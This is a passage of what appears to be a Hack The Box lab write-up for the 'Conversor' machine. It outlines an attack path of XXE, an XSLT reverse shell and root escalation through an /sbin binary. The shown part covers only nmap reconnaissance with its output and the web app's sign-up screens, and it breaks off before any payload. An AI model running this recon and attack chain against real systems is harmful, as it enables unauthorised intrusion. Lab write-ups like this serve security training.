https://substackcdn.com/image/fetch/$s_!50Um!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e3c7bb1-7fd7-477f-998a-076c74f47d12_817x496.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!50Um!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e3c7bb1-7fd7-477f-998a-076c74f47d12_817x496.png" width="817" height="496" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3e3c7bb1-7fd7-477f-998a-076c74f47d12_817x496.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:496,&quot;width&quot;:817,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:149766,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/177145128?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e3c7bb1-7fd7-477f-998a-076c74f47d12_817x496.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!50Um!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e3c7bb1-7fd7-477f-998a-076c74f47d12_817x496.png 424w, https://substackcdn.com/image/fetch/$s_!50Um!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e3c7bb1-7fd7-477f-998a-076c74f47d12_817x496.png 848w, https://substackcdn.com/image/fetch/$s_!50Um!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e3c7bb1-7fd7-477f-998a-076c74f47d12_817x496.png 1272w, https://substackcdn.com/image/fetch/$s_!50Um!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3e3c7bb1-7fd7-477f-998a-076c74f47d12_817x496.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><em>From HTB:</em> -</p><p>Kinda finished this box under 20~ mins, All you need to execute are just XXE and your XSL/XSLT reverse-shell would gave you the machine access.</p><p>Then PrivEsc to User and root via enumeration, manipulate UID to 0 via binary application on /SBIN.</p><ol><li><p><em>Network Enumeration and Port Discovery</em></p></li></ol><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ping -c2 10.10.11.92      
PING 10.10.11.92 (10.10.11.92) 56(84) bytes of data.
64 bytes from 10.10.11.92: icmp_seq=1 ttl=63 time=910 ms
64 bytes from 10.10.11.92: icmp_seq=2 ttl=63 time=254 ms

--- 10.10.11.92 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 254.326/582.331/910.336/328.005 ms</code></pre><p>Now with the Network scanning:</p><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p- --min-rate 8000 10.10.11.92 -oA nmap/nmapscan
Starting Nmap 7.95 ( https://nmap.org ) at 
Nmap scan report for 10.10.11.92
Host is up (0.26s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http</code></pre><p>We only got 2 ports but no problem:</p><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p22,80 -sC -sV -sCV -A -v 10.10.11.92 -oA nmap/nmapscan-ports 
Starting Nmap 7.95 ( https://nmap.org ) at 
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
. . .[SNIP]. . .
Nmap scan report for 10.10.11.92
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA)
|_  256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://conversor.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14
Uptime guess: 30.199 days (since Thu Sep 25 22:14:16 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: conversor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   254.30 ms 10.10.14.1
2   256.64 ms 10.10.11.92

NSE: Script Post-scanning.
Initiating NSE at 03:00
Completed NSE at 03:00, 0.00s elapsed
Initiating NSE at 03:00
Completed NSE at 03:00, 0.00s elapsed
Initiating NSE at 03:00
Completed NSE at 03:00, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds
           Raw packets sent: 37 (2.486KB) | Rcvd: 26 (1.818KB)</code></pre><p>We got a domain:</p><pre><code>conversor.htb</code></pre><pre><code>&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat nmap/nmapscan-ports.nmap 
# Nmap 7.95 scan initiated as: /usr/lib/nmap/nmap -Pn -p22,80 -sC -sV -sCV -A -v -oA nmap/nmapscan-ports 10.10.11.92
Nmap scan report for 10.10.11.92
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA)
|_  256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://conversor.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14
Uptime guess: 30.199 days (since Thu Sep 25 22:14:16 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: conversor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   254.30 ms 10.10.14.1
2   256.64 ms 10.10.11.92

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at -- 1 IP address (1 host up) scanned in seconds</code></pre><p>WebApp:</p><pre><code>http://conversor.htb</code></pre><ol start="2"><li><p><em>WebApp Enumeration and Directory Discovery</em></p></li></ol><p>Create an account.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!oCAZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0024365d-3996-4791-89af-1d3d117973ce_1523x747.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!oCAZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0024365d-3996-4791-89af-1d3d117973ce_1523x747.png 424w, https://substackcdn.com/image/fetch/$s_!oCAZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0024365d-3996-4791-89af-1d3d117973ce_1523x747.png 848w, https://substackcdn.com/image/fetch/$s_!oCAZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0024365d-3996-4791-89af-1d3d117973ce_1523x747.png 1272w, https://substackcdn.com/image/fetch/$s_!oCAZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0024365d-3996-4791-89af-1d3d117973ce_1523x747.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!oCAZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0024365d-3996-4791-89af-1d3d117973ce_1523x747.png" width="1523" height="747" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0024365d-3996-4791-89af-1d3d117973ce_1523x747.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:747,&quot;width&quot;:1523,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:118307,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/177145128?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc0eefbad-e6a4-4ff3-9a87-da3999360919_1523x747.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!oCAZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0024365d-3996-4791-89af-1d3d117973ce_1523x747.png 424w, https://substackcdn.com/image/fetch/$s_!oCAZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0024365d-3996-4791-89af-1d3d117973ce_1523x747.png 848w, https://substackcdn.com/image/fetch/$s_!oCAZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0024365d-3996-4791-89af-1d3d117973ce_1523x747.png 1272w, https://substackcdn.com/image/fetch/$s_!oCAZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0024365d-3996-4791-89af-1d3d117973ce_1523x747.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Note: You need to create an account for you to access it. And when your in, this is the Interface:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!77ou!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e018e87-af90-4a45-a232-243c12708917_1419x795.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!77ou!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e018e87-af90-4a45-a232-243c12708917_1419x795.png 424w, https://substackcdn.com/image/fetch/$s_!77ou!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e018e87-af90-4a45-a232-243c12708917_1419x795.png 848w, https://substackcdn.com/image/fetch/$s_!77ou!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e018e87-af90-4a45-a232-243c12708917_1419x795.png 1272w, https://substackcdn.com/image/fetch/$s_!77ou!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e018e87-af90-4a45-a232-243c12708917_1419x795.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!77ou!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e018e87-af90-4a45-a232-243c12708917_1419x795.png" width="1419" height="795" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0e018e87-af90-4a45-a232-243c12708917_1419x795.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:795,&quot;width&quot;:1419,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:168050,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/177145128?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e018e87-af90-4a45-a232-243c12708917_1419x795.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!77ou!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e018e87-af90-4a45-a232-243c12708917_1419x795.png 424w, https://substackcdn.com/image/fetch/$s_!77ou!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e018e87-af90-4a45-a232-243c12708917_1419x795.png 848w, https://substackcdn.com/image/fetch/$s_!77ou!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e018e87-af90-4a45-a232-243c12708917_1419x795.png 1272w, https://substackcdn.com/image/fetch/$s_!77ou!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e018e87-af90-4a45-a232-243c12708917_1419x795.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!nyGf!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9369f547-9817-4271-be11-61ab63bfebf1_1419x795.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!nyGf!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9369f547-9817-4271-be11-61ab63bfebf1_1419x795.png 424w, https://substackcdn.com/image/fetch/$s_!nyGf!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9369f547-9817-4271-be11-61ab63bfebf1_1419x795.png 848w, https://substackcdn.com/image/fetch/$s_!nyGf!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9369f547-9817-4271-be11-61ab63bfebf1_1419x795.png 1272w, https://substackcdn.com/image/fetch/$s_!nyGf!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9369f547-9817-4271-be11-61ab63bfebf1_1419x795.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!nyGf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9369f547-9817-4271-be11-61ab63bfebf1_1419x795.png" width="1419" height="795" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9369f547-9817-4271-be11-61ab63bfebf1_1419x795.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:795,&quot;width&quot;:1419,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:209038,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/177145128?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3cdb62c1-2fd8-49e5-b9bf-6ef9505746ad_1419x795.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!nyGf!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9369f547-9817-4271-be11-61ab63bfebf1_1419x795.png 424w, https://substackcdn.com/image/fetch/$s_!nyGf!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9369f547-9817-4271-be11-61ab63bfebf1_1419x795.png 848w, https://substackcdn.com/image/fetch/$s_!nyGf!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9369f547-9817-4271-be11-61ab63bfebf1_1419x795.png 1272w, https://substackcdn.com/image/fetch/$s_!nyGf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9369f547-9817-4271-be11-61ab63bfebf1_1419x795.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>First by seeing the Interface I can already imagine the Back-end processing our payloads could be a foothold for Us:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!dHPB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0432b267-e849-4cc6-87bf-1af0097b5bc5_1419x795.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!dHPB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0432b267-e849-4cc6-87bf-1af0097b5bc5_1419x795.png 424w, https://substackcdn.com/image/fetch/$s_!dHPB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0432b267-e849-4cc6-87bf-1af0097b5bc5_1419x795.png 848w, https://substackcdn.com/image/fetch/$s_!dHPB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0432b267-e849-4cc6-87bf-1af0097b5bc5_1419x795.png 1272w, https://substackcdn.com/image/fetch/$s_!dHPB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0432b267-e849-4cc6-87bf-1af0097b5bc5_1419x795.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!dHPB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0432b267-e849-4cc6-87bf-1af0097b5bc5_1419x795.png" width="1419" height="795" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0432b267-e849-4cc6-87bf-1af0097b5bc5_1419x795.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:795,&quot;width&quot;:1419,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:168988,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/177145128?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9fbda491-2377-4281-95d2-08ca13f81117_1419x795.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!dHPB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0432b267-e849-4cc6-87bf-1af0097b5bc5_1419x795.png 424w, https://substackcdn.com/image/fetch/$s_!dHPB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0432b267-e849-4cc6-87bf-1af0097b5bc5_1419x795.png 848w, https://substackcdn.com/image/fetch/$s_!dHPB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0432b267-e849-4cc6-87bf-1af0097b5bc5_1419x795.png 1272w, https://substackcdn.com/image/fetch/$s_!dHPB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0432b267-e849-4cc6-87bf-1af0097b5bc5_1419x795.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 